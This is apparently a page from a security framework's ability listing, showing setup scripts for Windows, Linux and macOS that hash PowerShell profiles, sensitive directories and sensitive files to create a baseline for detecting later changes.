This ability creates file hashes of PowerShell profiles, creating the profiles themselves if they do not exist.
[{"platform": "windows", "executor": "psh", "command": "$files = @(\"$Profile\", \"$PsHome\\Profile.ps1\", \"$PsHome\\Microsoft.Powershell_profile.ps1\");\n$output = @();\nForEach ($file in $files) {\n  if (-not (Test-Path $file)) {\n    New-Item -Path $file -ItemType File | Out-Null;\n  };\n  $output += $(Get-FileHash $file -EA silentlycontinue | foreach-object {$_.Path + '>' + $_.Hash});\n};\n$output\n"}]
setup ["linux", "darwin", "windows"] x · x ↗
Hash Sensitive Directories
Acquire hashes of compressed sensitive directories as a baseline to check if they are changed in the future
[{"platform": "linux", "executor": "sh", "command": "output=\"\";\ndir_path=$(echo \"#{directory.sensitive.path}\" | sed 's/\\\\\\*/\\*/g');\ndirectories=$(find $dir_path -maxdepth 0 -type d 2>/dev/null);\nfor directory in $directories;\n  do if [ -z \"$(ls -A $directory)\" ]; then\n    touch \"${directory}/.bak\";\n  fi;\n  tar -czf /tmp/dir_sens_comp -C $directory .;\n  hash=$(sha256sum /tmp/dir_sens_comp | cut -d' ' -f1);\n  output=\"${output}${directory}>${hash}\\n\";\n  rm -f /tmp/dir_sens_comp;\ndone;\necho $output | sed '/^[[:space:]]*$/d'\n"}, {"platform": "darwin", "executor": "sh", "command": "output=\"\";\ndir_path=$(echo \"#{directory.sensitive.path}\" | sed 's/\\\\\\*/\\*/g');\ndirectories=$(find $dir_path -maxdepth 0 -type d 2>/dev/null);\nfor directory in $directories;\n  do if [ -z \"$(ls -A $directory)\" ]; then\n    touch \"${directory}/.bak\";\n  fi;\n  tar -cf - -C $directory . | gzip --no-name > /tmp/dir_sens_comp;\n  hash=$(shasum -a 256 /tmp/dir_sens_comp | cut -d' ' -f1);\n  output=\"${output}${directory}>${hash}\\n\";\n  rm -f /tmp/dir_sens_comp;\ndone;\necho $output | sed '/^[[:space:]]*$/d'\n"}, {"platform": "windows", "executor": "psh", "command": "$output = '';\nGet-Item #{directory.sensitive.path} -EA silentlycontinue | Where-Object { $_ -is [System.IO.DirectoryInfo] } | foreach-object {\n  if ((Get-ChildItem $_.FullName -Force | Measure-Object).count -eq 0) {\n    echo '' > $($_.FullName + \"\\.bak\");\n  };\n  Compress-Archive -Force -Path $($_.FullName + \"\\*\") -DestinationPath $(\"C:\\Users\\Public\\dir_sens_comp.zip\");\n  $hash = (Get-FileHash C:\\Users\\Public\\dir_sens_comp.zip).Hash;\n  Remove-Item -Force C:\\Users\\Public\\dir_sens_comp.zip;\n  $output = \"$($output)$($_.FullName)>$($hash)`n\";\n};\n$output;\n"}]
setup ["linux", "darwin", "windows"] x · x ↗
Hash Sensitive Files
Acquire hashes of sensitive files as a baseline to check if they are changed in the future
[{"platform": "linux", "executor": "sh", "command": "output=\"\";\nfilepath=$(echo \"#{file.sensitive.path}\" | sed 's/\\\\\\*/\\*/g');\nfiles=$(find $filepath -maxdepth 0 -type f 2>/dev/null);\nfor file in $files;\n  do hash=$(sha256sum $file | cut -d' ' -f1);\n  output=\"${output}${file}>${hash}\\n\";\ndone;\necho $output | sed '/^[[:space:]]*$/d'\n"}, {"platform": "darwin", "executor": "sh", "command": "output=\"\";\nfilepath=$(echo \"#{file.sensitive.path}\" | sed 's/\\\\\\*/\\*/g');\nfiles=$(find $filepath -maxdepth 0 -type f 2>/dev/null);\nfor file in $files;\n  do hash=$(shasum -a 256 $file | cut -d' ' -f1);\n  output=\"${output}${file}>${hash}\\n\";\ndone;\necho $output | sed '/^[[:space:]]*$/d'\n"}, {"platform": "windows", "executor": "psh", "command": "Get-FileHash #{file.sensitive.path} -EA silentlycontinue | foreach-object {$_.Path + '>' + $_.Hash}\n"}]
Showing 151-200 of 211